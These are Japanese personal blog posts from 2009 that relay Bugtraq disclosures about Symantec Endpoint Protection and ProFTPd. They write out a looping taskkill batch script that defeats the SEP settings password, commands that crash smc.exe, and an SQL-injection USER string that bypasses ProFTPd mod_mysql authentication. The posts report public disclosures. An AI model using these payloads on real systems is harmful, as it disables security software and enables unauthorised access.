miyapiのひとりごと

blogこと始め。コンピュータと映画、そしてお酒の好きなmiyapiが気ままに書きつづる日記。。。

SEP Privilege Escalation attack

2009-02-21 09:56:44 | Weblog
SEP (Symantec Endpoint Protection )の smcgui.exe を Kill しつづければ、
設定画面(symcorpui.exe ) がパスワード無しに開ける。。らしい。

やり方は簡単で、下記のバッチを実行中に symcorpui.exe を起動する、というもの。

( taskkill は windowsXPのコマンドで unix とかの kill と同じ。
詳細は http://itpro.nikkeibp.co.jp/free/NT/WinKeyWord/20040805/1/taskkill.shtml )

-------------------------------
:here
taskkill /im smcgui.exe /f
goto :here
-------------------------------

詳細はこちら(bugtraq のアーカイブ)

http://marc.info/?l=bugtraq&m=123516108332445&w=2

もとの記事は STN (Symantec Technorogy Network)のこちらのスレッドを参照

https://forums.symantec.com/syment/board/message?board.id=endpoint_protection11&message.id=26289


Symantec はこのことに対してまだコメントを出していないそうだ。。

SEP ( Symantec Endpoint Protection )

2009-02-15 07:48:48 | Weblog
Symantec Endpoint Protection に含まれる、smc.exe (Symantec Management Client)
を、権限の無いユーザーでクラッシュさせる方法が bugtraq に流れている。

smc.exe -p ~

または、タスクマネージャであらかじめ smc.exe のプロセスIDを調べておいて、

drwtsn32 -p %pid%

というのも有効らしい。
それにしても、ワトソン博士の -p オプションってどんな意味だろう?
( smc.exe の -p はパスワードを指定する、というオプションだそうな。)

proftpd Exploit in the wild.

2009-02-14 10:02:05 | Weblog
ProFTPd の mod_mysql の認証回避の実証コードがリリースされたみたい。。
FTPのUSERコマンドで SQL Injection を利用する、例のアレである。

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --

サンプルコードはこちら。

ProFTPd with mod_mysql Authentication Bypass Exploit

http://seclists.org/bugtraq/2009/Feb/0088.html

proftpd

2009-02-11 11:16:27 | Weblog
proftpd に sqlインジェクションを使ってログインが可能、との記事が bagtraqに流れている。
こんなの本当に可能なのかしらん。。?

http://seclists.org/bugtraq/2009/Feb/0084.html

>Just found out a problem with proftpd's sql authentication. The problem is easily reproducible if >you login with username like:

>USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --

>and a password of "1" (without quotes).